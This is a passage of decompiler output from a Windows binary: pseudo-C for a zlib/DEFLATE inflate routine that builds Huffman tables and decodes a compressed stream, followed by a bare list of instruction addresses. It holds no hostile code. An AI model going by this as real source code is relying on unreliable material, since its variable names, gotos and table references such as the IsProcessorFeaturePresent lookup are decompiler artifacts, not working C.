													_t873 =  *((short*)(_t1350 + 0x960 + _t919 * 2));
													_v12 = _t873;
													__eflags = _t873;
												} while (_t873 < 0);
												goto L163;
											} else {
												_t1233 = _t915 >> 9;
												L163:
												_v8 = _v8 >> _t1233;
												_t1364 = _t1364 - _t1233;
												__eflags = _t873 & 0x00000100;
												if((_t873 & 0x00000100) != 0) {
													goto L198;
												}
												__eflags = _t1364 - 0xf;
												if(_t1364 >= 0xf) {
													_t920 = _v8;
												} else {
													_t920 = _v8 | (( *(_t1288 + 1) & 0x000000ff) << 0x00000008 |  *_v16 & 0x000000ff) << _t1364;
													_t1288 = _v16 + 2;
													_v8 = _t920;
													_v16 = _t1288;
													_t1364 = _t1364 + 0x10;
												}
												_t922 =  *((short*)(_t1350 + 0x160 + (_t920 & 0x000003ff) * 2));
												_v28 = _t922;
												__eflags = _t922;
												if(_t922 < 0) {
													_t1234 = 0xa;
													_v40 = _t1234;
													do {
														_t926 = (_v8 >> _t1234 & _v24) +  !_v28;
														_t1234 = _v40 + 1;
														_v40 = _t1234;
														_t873 =  *((short*)(_t1350 + 0x960 + _t926 * 2));
														_v28 = _t873;
														__eflags = _t873;
													} while (_t873 < 0);
													goto L171;
												} else {
													_t1234 = _t922 >> 9;
													L171:
													_t1364 = _t1364 - _t1234;
													_v8 = _v8 >> _t1234;
													 *_v32 = _v12;
													_t1113 = 0xffffffff;
													__eflags = _t873 & 0x00000100;
													if((_t873 & 0x00000100) != 0) {
														_t456 =  &_v32;
														 *_t456 = _v32 + 1;
														__eflags =  *_t456;
														goto L198;
													}
													_t1239 = _v32;
													 *(_t1239 + 1) = _t873;
													_t1222 = _t1239 + 2;
													goto L196;
												}
											}
										}
										_v20 = 0x40 + _t865 * 0xda0 + _t1350;
										memset( &_v212, 0, 0x40);
										memset(_v20 + 0x120, 0, 0x800);
										memset(_v20 + 0x920, 0, 0x480);
										_t1304 = _t1350[6];
										_t1244 = 0;
										_t1379 = _t1379 + 0x24;
										__eflags =  *(_t1350 + 0x2c + _t1304 * 4);
										if( *(_t1350 + 0x2c + _t1304 * 4) <= 0) {
											L91:
											_v28 = _v28 & 0x00000000;
											_t1245 = 0;
											_v144 = _v144 & 0;
											_t189 =  &_v148;
											 *_t189 = _v148 & 0;
											__eflags =  *_t189;
											_t1305 = 4;
											do {
												_t988 =  *((intOrPtr*)(_t1378 + _t1305 - 0xd0));
												_v28 = _v28 + _t988;
												_t1245 = _t1245 + _t988 + _t1245 + _t988;
												 *((intOrPtr*)(_t1378 + _t1305 - 0x8c)) = _t1245;
												_t1305 = _t1305 + 4;
												__eflags = _t1305 - 0x3c;
											} while (_t1305 <= 0x3c);
											__eflags = _t1245 - 0x10000;
											if(_t1245 == 0x10000) {
												L95:
												_t989 = _t1350[6];
												_v52 = _v52 & 0x00000000;
												_v40 = _t1113;
												__eflags =  *(_t1350 + 0x2c + _t989 * 4);
												if( *(_t1350 + 0x2c + _t989 * 4) <= 0) {
													L117:
													__eflags = _t1350[6] - 2;
													if(_t1350[6] != 2) {
														L152:
														_t1350[6] = _t1350[6] - 1;
														goto L86;
													}
													_t1247 = 0;
													__eflags = 0;
													L119:
													_v12 = _t1247;
													__eflags = _t1247 - _t1350[0xc] + _t1350[0xb];
													if(_t1247 >= _t1350[0xc] + _t1350[0xb]) {
														__eflags = _t1350[0xc] + _t1350[0xb] - _t1247;
														if(_t1350[0xc] + _t1350[0xb] != _t1247) {
															_t1288 = _v16;
															L290:
															_v20 = _t1113;
															 *_t1350 = 0x15;
															goto L339;
														}
														memcpy( &(_t1350[0x10]),  &(_t1350[0xa49]), _t1350[0xb]);
														_t999 = _t1350[0xb] + 0x2924 + _t1350;
														__eflags = _t999;
														memcpy( &(_t1350[0x378]), _t999, _t1350[0xc]);
														_t1379 = _t1379 + 0x18;
														goto L152;
													}
													_t1288 = _v16;
													__eflags = _t1364 - 0xf;
													if(_t1364 >= 0xf) {
														L125:
														_t1248 = _v8;
														L126:
														_t1004 =  *((short*)(_t1350 + 0x1ca0 + (_t1248 & 0x000003ff) * 2));
														_v44 = _t1004;
														__eflags = _t1004;
														if(_t1004 < 0) {
															_t1249 = 0xa;
															do {
																_v44 =  !_v44;
																_t1008 = (_v8 >> _t1249 & 0x00000001) + _v44;
																_t1249 = _t1249 + 1;
																_t1009 =  *((short*)(_t1350 + 0x24a0 + _t1008 * 2));
																_v44 = _t1009;
																__eflags = _t1009;
															} while (_t1009 < 0);
															L138:
															_t1364 = _t1364 - _t1249;
															_t1011 = _v8 >> _t1249;
															_t1250 = _v44;
															_v8 = _t1011;
															_v48 = _t1364;
															__eflags = _t1250 - 0x10;
															if(__eflags >= 0) {
																if(__eflags != 0) {
																	L142:
																	_t1251 =  *((char*)(_t1250 +  &__imp__IsProcessorFeaturePresent));
																	_v56 = _t1251;
																	__eflags = _t1364 - _t1251;
																	if(_t1364 >= _t1251) {
																		L146:
																		_t1364 = _t1364 - _t1251;
																		_v48 = _t1364;
																		_t1252 = _v44;
																		_v8 = _t1011 >> _t1251;
																		_t336 = _t1252 + 0x411008; // 0x0
																		_t1310 = ((_v24 << _t1251) - 0x00000001 & _t1011) +  *_t336;
																		_t1014 = _v12;
																		_v52 = _t1310;
																		__eflags = _v44 - 0x10;
																		if(_v44 != 0x10) {
																			_t1253 = 0;
																			__eflags = 0;
																		} else {
																			_t1253 =  *(_t1014 +  &(_t1350[0xa48])) & 0x000000ff;
																		}
																		memset(_t1014 + 0x2924 + _t1350, _t1253, _t1310);
																		_t1379 = _t1379 + 0xc;
																		_t1247 = _v12 + _v52;
																		goto L119;
																	} else {
																		goto L143;
																	}
																	while(1) {
																		L143:
																		__eflags = _t1288 - _v36;
																		if(_t1288 >= _v36) {
																			break;
																		}
																		_t1019 = ( *_t1288 & 0x000000ff) << _t1364;
																		_t1288 = _t1288 + 1;
																		_v8 = _v8 | _t1019;
																		_t1364 = _t1364 + 8;
																		_t1251 = _v56;
																		_v16 = _t1288;
																		__eflags = _t1364 - _t1251;
																		if(_t1364 < _t1251) {
																			continue;
																		}
																		_t1011 = _v8;
																		goto L146;
																	}
																	 *_t1350 = 0x12;
																	goto L335;
																}
																__eflags = _v12;
																if(_v12 == 0) {
																	L287:
																	_v20 = _t1113;
																	 *_t1350 = 0x11;
																	goto L339;
																}
																goto L142;
															}
															_t1256 = _v12;
															 *((char*)(_t1256 +  &(_t1350[0xa49]))) = _v44;
															_t1247 = _t1256 + 1;
															goto L119;
														}
														_t1249 = _t1004 >> 9;
														_v44 = _t1004 & 0x000001ff;
														goto L138;
													}
													__eflags = _v36 - _t1288 - 2;
													if(_v36 - _t1288 >= 2) {
														_t1248 = _v8 | ( *(_t1288 + 1) & 0x000000ff) << _t1364 + 0x00000008 | ( *_v16 & 0x000000ff) << _t1364;
														_t1288 = _v16 + 2;
														_v8 = _t1248;
														_v16 = _t1288;
														_t1364 = _t1364 + 0x10;
														goto L126;
													}
													L122:
													_t1029 =  *((short*)(_t1350 + 0x1ca0 + (_v8 & 0x000003ff) * 2));
													_v40 = _t1029;
													__eflags = _t1029;
													if(_t1029 < 0) {
														__eflags = _t1364 - 0xa;
														if(_t1364 <= 0xa) {
															L132:
															__eflags = _t1288 - _v36;
															if(_t1288 >= _v36) {
																 *_t1350 = 0x10;
																goto L335;
															}
															_t1031 = ( *_t1288 & 0x000000ff) << _t1364;
															_t1288 = _t1288 + 1;
															_t1364 = _t1364 + 8;
															_t1248 = _v8 | _t1031;
															_v16 = _t1288;
															_v8 = _t1248;
															__eflags = _t1364 - 0xf;
															if(_t1364 < 0xf) {
																goto L122;
															}
															goto L126;
														}
														_t1263 = 0xa;
														_v28 = _t1263;
														while(1) {
															_t1266 =  *((short*)(_t1350 + 0x24a0 + ((_v8 >> _t1263 & _v24) +  !_v40) * 2));
															_t1037 = _v28 + 1;
															_v40 = _t1266;
															_v28 = _t1037;
															__eflags = _t1266;
															if(_t1266 >= 0) {
																goto L125;
															}
															_t1263 = _v28;
															__eflags = _t1364 - _t1037 + 1;
															if(_t1364 >= _t1037 + 1) {
																continue;
															}
															goto L132;
														}
														goto L125;
													}
													_t1039 = _t1029 >> 9;
													__eflags = _t1039;
													if(_t1039 == 0) {
														goto L132;
													}
													__eflags = _t1364 - _t1039;
													if(_t1364 < _t1039) {
														goto L132;
													}
													goto L125;
												}
												_t1375 = _v52;
												do {
													_t1315 = 0;
													_t1267 =  *(_t1375 + _v20) & 0x000000ff;
													_v52 = _t1267;
													__eflags = _t1267;
													if(_t1267 == 0) {
														goto L115;
													}
													_t1124 =  *(_t1378 + _t1267 * 4 - 0x90);
													_v28 = _t1267;
													 *(_t1378 + _t1267 * 4 - 0x90) = _t1124 + 1;
													do {
														_t1315 = _t1315 + _t1315 | _t1124 & _v24;
														_t1124 = _t1124 >> 1;
														_t1044 = _v28 - 1;
														_v28 = _t1044;
														__eflags = _t1044;
													} while (_t1044 != 0);
													_t1270 = _v52;
													__eflags = _t1270 - 0xa;
													if(_t1270 > 0xa) {
														_t1046 = _t1315 & 0x000003ff;
														_t1124 =  *(_v20 + 0x120 + _t1046 * 2);
														_v28 = _t1124;
														__eflags = _t1124;
														if(_t1124 == 0) {
															_t1128 = _v40;
															_v28 = _t1128;
															 *(_v20 + 0x120 + _t1046 * 2) = _t1128;
															_t1124 = _t1128 - 2;
															__eflags = _t1124;
															_t1350 = _v64;
															_v40 = _t1124;
														}
														_t1317 = _t1315 >> 9;
														__eflags = _t1270 - 0xb;
														if(_t1270 <= 0xb) {
															L114:
															_t1320 = (_t1317 >> 0x00000001 & _v24) - _v28;
															__eflags = _t1320;
															 *(_v20 + 0x91e + _t1320 * 2) = _t1375;
															goto L115;
														} else {
															_t1355 = _v24;
															_t244 = _t1270 - 0xb; // -11
															_t1127 = _t244;
															_t1271 = _v28;
															do {
																_t1317 = _t1317 >> 1;
																_t1051 = 0x48f - _t1271 - (_t1317 & _t1355);
																_t1274 =  *(_v20 + 0x91e) & 0x0000ffff;
																__eflags = _t1274;
																if(_t1274 != 0) {
																	_t1271 = _t1274;
																} else {
																	_t1271 = _v40;
																	 *(_v20 + _t1051 * 2) = _t1271;
																	_t1355 = _v24;
																	_v40 = _t1271 - 2;
																}
																_t1127 = _t1127 - 1;
																__eflags = _t1127;
															} while (_t1127 != 0);
															_t1350 = _v64;
															_v28 = _t1271;
															goto L114;
														}
													}
													_v52 = (_t1270 << 0x00000009 | _t1375) & 0x0000ffff;
													__eflags = _t1315 - 0x400;
													if(_t1315 >= 0x400) {
														goto L115;
													}
													_t1358 = _v52;
													_t1124 = _v24 << _t1270;
													_t1060 = _v20 + _t1315 * 2 + 0x120;
													__eflags = _t1060;
													_t1275 = _t1124 + _t1124;
													do {
														 *_t1060 = _t1358;
														_t1315 = _t1315 + _t1124;
														_t1060 = _t1060 + _t1275;
														__eflags = _t1315 - 0x400;
													} while (_t1315 < 0x400);
													_t1350 = _v64;
													L115:
													_t1041 = _t1350[6];
													_t1375 = _t1375 + 1;
													__eflags = _t1375 -  *((intOrPtr*)(_t1350 + 0x2c + _t1041 * 4));
												} while (_t1375 <  *((intOrPtr*)(_t1350 + 0x2c + _t1041 * 4)));
												_t1364 = _v48;
												_t1113 = _t1124 | 0xffffffff;
												__eflags = _t1113;
												goto L117;
											}
											__eflags = _v28 - _v24;
											if(_v28 > _v24) {
												_t1288 = _v16;
												L285:
												_v20 = _t1113;
												 *_t1350 = 0x23;
												goto L339;
											}
											goto L95;
										}
										_t1123 = _v20;
										do {
											 *((intOrPtr*)(_t1378 + ( *(_t1244 + _t1123) & 0x000000ff) * 4 - 0xd0)) =  *((intOrPtr*)(_t1378 + ( *(_t1244 + _t1123) & 0x000000ff) * 4 - 0xd0)) + 1;
											_t1244 = _t1244 + 1;
											__eflags = _t1244 -  *(_t1350 + 0x2c + _t1304 * 4);
										} while (_t1244 <  *(_t1350 + 0x2c + _t1304 * 4));
										_t1113 = _t1123 | 0xffffffff;
										__eflags = _t1113;
										goto L91;
									}
									__eflags = _t1364 - 3;
									if(_t1364 >= 3) {
										L80:
										_t135 = _t864 + 0x411a34; // 0x121110
										_t1277 = _t1303 & 0x00000007;
										_t1303 = _t1303 >> 3;
										_t1364 = _t1364 - 3;
										_v8 = _t1303;
										_v48 = _t1364;
										 *( &(_t1350[0x6e0]) + ( *_t135 & 0x000000ff)) = _t1277;
										_t864 = _v12 + 1;
										goto L74;
									}
									_t1288 = _v16;
									while(1) {
										L77:
										__eflags = _t1288 - _v36;
										if(_t1288 >= _v36) {
											break;
										}
										_t1066 = ( *_t1288 & 0x000000ff) << _t1364;
										_t1288 = _t1288 + 1;
										_v8 = _v8 | _t1066;
										_t1364 = _t1364 + 8;
										_v16 = _t1288;
										__eflags = _t1364 - 3;
										if(_t1364 < 3) {
											continue;
										}
										_t864 = _v12;
										_t1303 = _v8;
										goto L80;
									}
									 *_t1350 = 0xe;
									goto L335;
								}
								_t1067 = 0x20;
								_t1350[0xc] = _t1067;
								_t1376 =  &(_t1350[0x10]);
								_t1350[0xb] = 0x120;
								memset( &(_t1350[0x378]), 5, _t1067);
								_t1359 = _v80;
								E0040FDD0(_t1376, 8, _t1359);
								_t1377 = _t1376 + _t1359;
								E0040FDD0(_t1377, 9, 0x70);
								_t1279 = 6;
								memset(_t1377 + 0x70, 0x7070707, _t1279 << 2);
								_t1379 = _t1379 + 0x30;
								_t1350 = _v64;
								 *((intOrPtr*)(_t1377 + 0x88)) = 0x8080808;
								 *((intOrPtr*)(_t1377 + 0x8c)) = 0x8080808;
								_t1364 = _v48;
								goto L86;
							}
							_t1075 = _t770 - 1;
							__eflags = _t1075;
							if(_t1075 == 0) {
								goto L304;
							}
							_t1077 = _t1075;
							__eflags = _t1077;
							if(_t1077 == 0) {
								_t1119 = _v8;
								goto L322;
							}
							_t1078 = _t1077 - 1;
							__eflags = _t1078;
							if(_t1078 == 0) {
								_t1119 = _v8;
								goto L327;
							}
							_t1079 = _t1078 - 9;
							__eflags = _t1079;
							if(_t1079 == 0) {
								goto L270;
							}
							_t1080 = _t1079 - 1;
							__eflags = _t1080;
							if(_t1080 == 0) {
								_t846 = _v44;
								goto L276;
							}
							__eflags = _t1080 == 1;
							if(_t1080 == 1) {
								goto L235;
							}
							goto L343;
						}
						if(__eflags == 0) {
							goto L296;
						}
						_t1082 = _t769 - 0x19;
						__eflags = _t1082;
						if(_t1082 == 0) {
							goto L201;
						}
						_t1083 = _t1082 - 1;
						__eflags = _t1083;
						if(_t1083 == 0) {
							goto L217;
						}
						_t1084 = _t1083 - 1;
						__eflags = _t1084;
						if(_t1084 == 0) {
							goto L226;
						}
						_t1085 = _t1084 - 5;
						__eflags = _t1085;
						if(_t1085 == 0) {
							goto L306;
						}
						_t1087 = _t1085;
						__eflags = _t1087;
						if(_t1087 == 0) {
							goto L333;
						}
						_t1088 = _t1087 - 1;
						__eflags = _t1088;
						if(_t1088 == 0) {
							goto L285;
						}
						__eflags = _t1088 != 1;
						if(_t1088 != 1) {
							goto L339;
						}
						L49:
						_v20 = _t1113;
						 *_t1350 = 0x24;
						goto L339;
					}
					if(_t1384 == 0) {
						_t873 = _v12;
						goto L194;
					}
					_t1385 = _t769 - 0xa;
					if(_t1385 > 0) {
						_t1090 = _t769 - 0xb;
						__eflags = _t1090;
						if(_t1090 == 0) {
							goto L81;
						}
						_t1091 = _t1090 - 3;
						__eflags = _t1091;
						if(_t1091 == 0) {
							goto L77;
						}
						_t1093 = _t1091;
						__eflags = _t1093;
						if(_t1093 == 0) {
							goto L132;
						}
						_t1094 = _t1093 - 1;
						__eflags = _t1094;
						if(_t1094 == 0) {
							goto L287;
						}
						_t1095 = _t1094 - 1;
						__eflags = _t1095;
						if(_t1095 == 0) {
							goto L143;
						}
						_t1096 = _t1095 - 3;
						__eflags = _t1096;
						if(_t1096 == 0) {
							goto L290;
						}
						__eflags = _t1096 == 0;
						if(_t1096 == 0) {
							goto L185;
						}
						goto L339;
					}
					if(_t1385 == 0) {
						goto L298;
					}
					if(_t769 > 9) {
						goto L343;
					}
					switch( *((intOrPtr*)(_t769 * 4 +  &M00405E60))) {
						case 0:
							_t1099 = _v28;
							_t1170 = _t1099;
							_t1350[3] = _t1099;
							_t1364 = _t1099;
							_t1350[2] = _t1099;
							_v56 = _t1099;
							_v12 = _t1099;
							_v44 = _t1099;
							_t1100 = _v24;
							_v8 = _t1170;
							_t1350[7] = _t1100;
							_t1350[4] = _t1100;
							if((_a20 & _t1100) == 0) {
								goto L66;
							}
							goto L12;
						case 1:
							L12:
							_t1281 = _v36;
							_t1101 = _t1288;
							if(_t1101 < _t1281) {
								_t1288 = _t1288 + 1;
								_t1350[2] =  *_t1101 & 0x000000ff;
								goto L16;
							}
							_t772 = _v24;
							 *_t1350 = _t772;
							goto L336;
						case 2:
							__ecx = _v36;
							L16:
							__eflags = _t1288 - _t1281;
							if(_t1288 < _t1281) {
								_t1103 =  *_t1288 & 0x000000ff;
								_t1282 = _t1350[2];
								_v28 = _t1103;
								_t1350[3] = _t1103;
								_t1106 = (_t1282 << 8) + _v28;
								_v16 = _t1288 + 1;
								_v40 = 0x1f;
								__eflags = _t1106 % _v40;
								if(_t1106 % _v40 != 0) {
									L23:
									_t1348 = _v24;
									_t1108 = _t1348;
									L24:
									__eflags = _v52;
									_v12 = _t1108;
									if(_v52 != 0) {
										L30:
										_t1288 = _v16;
										__eflags = _t1108;
										if(_t1108 != 0) {
											goto L49;
										}
										goto L63;
									}
									_t1349 = _t1348 << (_t1282 >> 4) + 8;
									__eflags = _t1349 - 0x8000;
									if(_t1349 > 0x8000) {
										L28:
										_t1285 = _v24;
										L29:
										_t1108 = _t1108 | _t1285;
										__eflags = _t1108;
										_v12 = _t1108;
										goto L30;
									}
									_push(0xffffffff);
									_pop(_t1113);
									__eflags = _v68 + 1 - _t1349;
									if(_v68 + 1 < _t1349) {
										goto L28;
									}
									_t1285 = 0;
									goto L29;
								}
								__eflags = _v28 & 0x00000020;
								if((_v28 & 0x00000020) != 0) {
									goto L23;
								}
								__eflags = (_t1282 & 0x0000000f) - 8;
								if((_t1282 & 0x0000000f) != 8) {
									goto L23;
								}
								_t1348 = _v24;
								_t1108 = 0;
								goto L24;
							}
							_push(2);
							_pop(_t1111);
							__eflags = _a20 & _t1111;
							_push(0xfffffffc);
							_pop(_t1131);
							_t1113 =  !=  ? _v24 : _t1131;
							 *_t1350 = _t1111;
							goto L18;
						case 3:
							goto L64;
						case 4:
							goto L339;
						case 5:
							goto L251;
						case 6:
							goto L258;
						case 7:
							goto L262;
						case 8:
							__ecx = _v32;
							goto L279;
					}
				}
			}



















































































































































































































































                  0x00404ad4
                  0x00404ae4
                  0x00404ae9
                  0x00404aee
                  0x00404af1
                  0x00404af4
                  0x00404afb
                  0x00404afd
                  0x00404b00
                  0x00404b03
                  0x00404b05
                  0x00404b0b
                  0x00404b11
                  0x00404b14
                  0x00404b17
                  0x00404b23
                  0x00404b26
                  0x00404b26
                  0x00404b28
                  0x00404b19
                  0x00404b19
                  0x00404b1b
                  0x00404b1b
                  0x00404b2b
                  0x00404b30
                  0x00405e4f
                  0x00405e52
                  0x00405e55
                  0x00405e55
                  0x00405e58
                  0x00000000
                  0x00404b3f
                  0x00404b42
                  0x00404b46
                  0x00404b49
                  0x00404b4c
                  0x00404b52
                  0x00404b58
                  0x00404b5e
                  0x00404b61
                  0x00404b63
                  0x00404b66
                  0x00404b69
                  0x00404b70
                  0x00404b77
                  0x00404b7a
                  0x00404cca
                  0x00404ccd
                  0x00404d19
                  0x00404d19
                  0x00404d1c
                  0x00404d50
                  0x00404d53
                  0x00404d56
                  0x00404d56
                  0x00404d59
                  0x00405ca3
                  0x00405ca9
                  0x00405ca9
                  0x00405cac
                  0x00405cb2
                  0x00405cb3
                  0x00405cb6
                  0x00405cb6
                  0x00405cbb
                  0x00405cd4
                  0x00405cd6
                  0x00405cdb
                  0x00405ce1
                  0x00405ce4
                  0x00405ce9
                  0x00405cf6
                  0x00405cfc
                  0x00405d02
                  0x00405d08
                  0x00405d0e
                  0x00405d14
                  0x00405d19
                  0x00405d20
                  0x00405d23
                  0x00405d25
                  0x00405e46
                  0x00000000
                  0x00405d33
                  0x00405d35
                  0x00405d3c
                  0x00405d3f
                  0x00405d42
                  0x00405d45
                  0x00405d4c
                  0x00405d4f
                  0x00405e2b
                  0x00405e30
                  0x00405e35
                  0x00405e42
                  0x00405e43
                  0x00405e43
                  0x00000000
                  0x00405e35
                  0x00405d55
                  0x00405d5a
                  0x00405d5a
                  0x00405d5c
                  0x00405d62
                  0x00405de9
                  0x00405deb
                  0x00000000
                  0x00000000
                  0x00405ded
                  0x00405df0
                  0x00405df2
                  0x00405df5
                  0x00405df7
                  0x00405df8
                  0x00405dfa
                  0x00405dfa
                  0x00405dfd
                  0x00000000
                  0x00405dfd
                  0x00405d68
                  0x00405d6b
                  0x00405d6e
                  0x00405d71
                  0x00405d74
                  0x00405d76
                  0x00405d79
                  0x00405d7f
                  0x00405d8a
                  0x00405d95
                  0x00405da0
                  0x00405dab
                  0x00405db6
                  0x00405dc1
                  0x00405dcc
                  0x00405dd1
                  0x00405dd4
                  0x00405dd6
                  0x00405ddb
                  0x00405ddf
                  0x00405de2
                  0x00405de4
                  0x00000000
                  0x00405e00
                  0x00405e08
                  0x00405e11
                  0x00405e14
                  0x00405e16
                  0x00405e19
                  0x00405e1c
                  0x00405e1c
                  0x00405e25
                  0x00405e28
                  0x00000000
                  0x00405e28
                  0x00405cc2
                  0x00405cc2
                  0x00405cc2
                  0x00405cd0
                  0x00405cc7
                  0x00405cca
                  0x00000000
                  0x00000000
                  0x00405ccc
                  0x00405ccd
                  0x00405ccd
                  0x00405ccd
                  0x00000000
                  0x00405cd0
                  0x00405cbb
                  0x00404d5f
                  0x00404d62
                  0x00404d67
                  0x00404d69
                  0x00404d6b
                  0x00404d6e
                  0x00404d70
                  0x00404d78
                  0x00404d81
                  0x00404d87
                  0x00404d8c
                  0x00404d8e
                  0x00404d8e
                  0x00404d90
                  0x00404d93
                  0x00404d96
                  0x00404d99
                  0x00404d9c
                  0x00404d9c
                  0x00404d9e
                  0x00405a60
                  0x00405a60
                  0x00405a63
                  0x00405a65
                  0x00000000
                  0x00000000
                  0x00405a6d
                  0x00405a6e
                  0x00405a71
                  0x00000000
                  0x00405a71
                  0x00404da4
                  0x00404da4
                  0x00404da8
                  0x00405b9d
                  0x00405b9f
                  0x00405bd2
                  0x00405bd5
                  0x00405bd5
                  0x00405bda
                  0x00405bdd
                  0x00405bdf
                  0x00405be1
                  0x00405be3
                  0x00405bf5
                  0x00405bf9
                  0x00405bfb
                  0x00405bfe
                  0x00405c01
                  0x00405c04
                  0x00405c06
                  0x00405c09
                  0x00405c0d
                  0x00405c0f
                  0x00405c13
                  0x00405c16
                  0x00405c93
                  0x00405c93
                  0x00405c96
                  0x00405c96
                  0x00405c98
                  0x00404c02
                  0x00404c02
                  0x00000000
                  0x00404c02
                  0x00405c18
                  0x00405c18
                  0x00405c1a
                  0x00405c1a
                  0x00405c1d
                  0x00405c20
                  0x00000000
                  0x00000000
                  0x00405c22
                  0x00405c24
                  0x00405c5e
                  0x00405c66
                  0x00405c66
                  0x00405c69
                  0x00405c8b
                  0x00000000
                  0x00405c8b
                  0x00405c6b
                  0x00405c6e
                  0x00405c6e
                  0x00405c6f
                  0x00405c72
                  0x00405c7d
                  0x00405c80
                  0x00000000
                  0x00405c80
                  0x00405c26
                  0x00405c29
                  0x00405c50
                  0x00405c50
                  0x00405c53
                  0x00405c56
                  0x00405c59
                  0x00000000
                  0x00405c59
                  0x00405c2b
                  0x00405c33
                  0x00405c33
                  0x00405c33
                  0x00405c36
                  0x00000000
                  0x00000000
                  0x00405c3d
                  0x00405c3f
                  0x00405c40
                  0x00405c42
                  0x00405c45
                  0x00405c48
                  0x00405c4b
                  0x00405c4e
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00405c4e
                  0x00405c83
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00405be5
                  0x00405be5
                  0x00405be5
                  0x00405be8
                  0x00000000
                  0x00000000
                  0x00405bea
                  0x00405beb
                  0x00405bee
                  0x00405bf0
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00405bf0
                  0x00405bf2
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00405ba1
                  0x00405ba1
                  0x00405ba1
                  0x00405ba4
                  0x00000000
                  0x00000000
                  0x00405ba9
                  0x00405bae
                  0x00405bb1
                  0x00405bb3
                  0x00405bb4
                  0x00405bb6
                  0x00405bbb
                  0x00405bc1
                  0x00405bc3
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00405bc5
                  0x00405bc7
                  0x00000000
                  0x00405bc7
                  0x00404dae
                  0x00404dae
                  0x00404dd2
                  0x00404dd2
                  0x00404dd5
                  0x00404db3
                  0x00404db3
                  0x00404db6
                  0x00405a7c
                  0x00000000
                  0x00405a7c
                  0x00404dc1
                  0x00404dc3
                  0x00404dc7
                  0x00404dc9
                  0x00404dcc
                  0x00404dcf
                  0x00404dcf
                  0x00000000
                  0x00404dcf
                  0x00404dd9
                  0x00404ddc
                  0x00404de2
                  0x00404de5
                  0x00404de5
                  0x00404de7
                  0x00404dea
                  0x00404ded
                  0x00404df0
                  0x0040592c
                  0x00405931
                  0x00405933
                  0x00405912
                  0x00405912
                  0x00405915
                  0x00405b4d
                  0x00000000
                  0x00405b4d
                  0x00405920
                  0x00405922
                  0x00405923
                  0x00405926
                  0x00405926
                  0x00405929
                  0x00000000
                  0x00405929
                  0x0040593a
                  0x0040593d
                  0x0040593f
                  0x00405941
                  0x00405944
                  0x00405944
                  0x00405946
                  0x00405949
                  0x00405949
                  0x0040594c
                  0x0040594f
                  0x004059ca
                  0x004059d9
                  0x004059e2
                  0x004059e4
                  0x00405b8a
                  0x00405b8a
                  0x00405b8d
                  0x00000000
                  0x00405b8d
                  0x004059ea
                  0x004059ed
                  0x004059ed
                  0x004059ef
                  0x00000000
                  0x00000000
                  0x004059f5
                  0x004059f7
                  0x00000000
                  0x00000000
                  0x004059fd
                  0x00405a00
                  0x00405a28
                  0x00405a2b
                  0x00405a2b
                  0x00405a31
                  0x00405a34
                  0x00405a37
                  0x00405a3a
                  0x00405a42
                  0x00405a42
                  0x00405a45
                  0x00405a48
                  0x00405b7b
                  0x00405b7c
                  0x00405b7f
                  0x00000000
                  0x00405b7f
                  0x00405a4e
                  0x00405a50
                  0x00405a54
                  0x00405a55
                  0x00405a58
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00405a02
                  0x00405a02
                  0x00405a02
                  0x00405a05
                  0x00000000
                  0x00000000
                  0x00405a10
                  0x00405a12
                  0x00405a16
                  0x00405a19
                  0x00405a1b
                  0x00405a1e
                  0x00405a21
                  0x00405a24
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00405a26
                  0x00405b6e
                  0x00000000
                  0x00405b6e
                  0x00405951
                  0x00405953
                  0x00405994
                  0x00405994
                  0x00405997
                  0x00405b63
                  0x00000000
                  0x00405b63
                  0x0040599d
                  0x0040599f
                  0x0040599f
                  0x004059a0
                  0x004059a7
                  0x004059aa
                  0x004059ad
                  0x004059ad
                  0x00000000
                  0x004059ad
                  0x00405955
                  0x00405958
                  0x0040597f
                  0x0040597f
                  0x00405986
                  0x00405989
                  0x0040598c
                  0x0040598f
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0040595a
                  0x0040595a
                  0x0040595a
                  0x0040595d
                  0x00000000
                  0x00000000
                  0x00405968
                  0x0040596a
                  0x0040596b
                  0x0040596e
                  0x00405971
                  0x00405974
                  0x00405977
                  0x00000000
                  0x00000000
                  0x00405979
                  0x0040597c
                  0x00000000
                  0x0040597c
                  0x00405b58
                  0x00000000
                  0x00405b58
                  0x00404df6
                  0x00404df9
                  0x00405b3f
                  0x00405b3f
                  0x00405b42
                  0x00000000
                  0x00405b42
                  0x00404dff
                  0x00404e02
                  0x00404e68
                  0x00404e68
                  0x00404e6a
                  0x00404e6a
                  0x00404e6d
                  0x00404e70
                  0x00404f0d
                  0x00404f0d
                  0x00404f0d
                  0x00404f14
                  0x00404f17
                  0x00404f19
                  0x00404ef0
                  0x00404ef0
                  0x00404ef3
                  0x00405a87
                  0x00000000
                  0x00405a87
                  0x00404efe
                  0x00404f00
                  0x00404f01
                  0x00404f04
                  0x00404f04
                  0x00404f07
                  0x00404f0a
                  0x00000000
                  0x00404f0a
                  0x00404f1e
                  0x00404f2a
                  0x00404f30
                  0x00404f30
                  0x00404f37
                  0x00404f3a
                  0x00404f3c
                  0x00404f3e
                  0x00404f48
                  0x00404f4b
                  0x00404f4c
                  0x00000000
                  0x00404f4c
                  0x00404e84
                  0x00404e8a
                  0x00404e8d
                  0x00404e90
                  0x00404e90
                  0x00404e92
                  0x00404e92
                  0x00404e95
                  0x00404e98
                  0x00404f54
                  0x00404f5b
                  0x00404f5b
                  0x00404f5e
                  0x00404f60
                  0x004053a3
                  0x004053a3
                  0x004053a6
                  0x004053a9
                  0x004053ab
                  0x004053ae
                  0x004054e3
                  0x004054e3
                  0x004054e6
                  0x00405513
                  0x00405513
                  0x00405516
                  0x0040551d
                  0x00405525
                  0x00405528
                  0x0040552a
                  0x004055d7
                  0x004055d8
                  0x004055db
                  0x004055e3
                  0x004055e6
                  0x004055e7
                  0x004055ef
                  0x004055f2
                  0x004055f2
                  0x004055f6
                  0x004055f6
                  0x004055f9
                  0x004055fb
                  0x00405600
                  0x00405621
                  0x00405621
                  0x00405626
                  0x00405629
                  0x0040562e
                  0x00000000
                  0x00000000
                  0x00405634
                  0x0040563b
                  0x00405647
                  0x0040564a
                  0x0040564d
                  0x0040564f
                  0x00405685
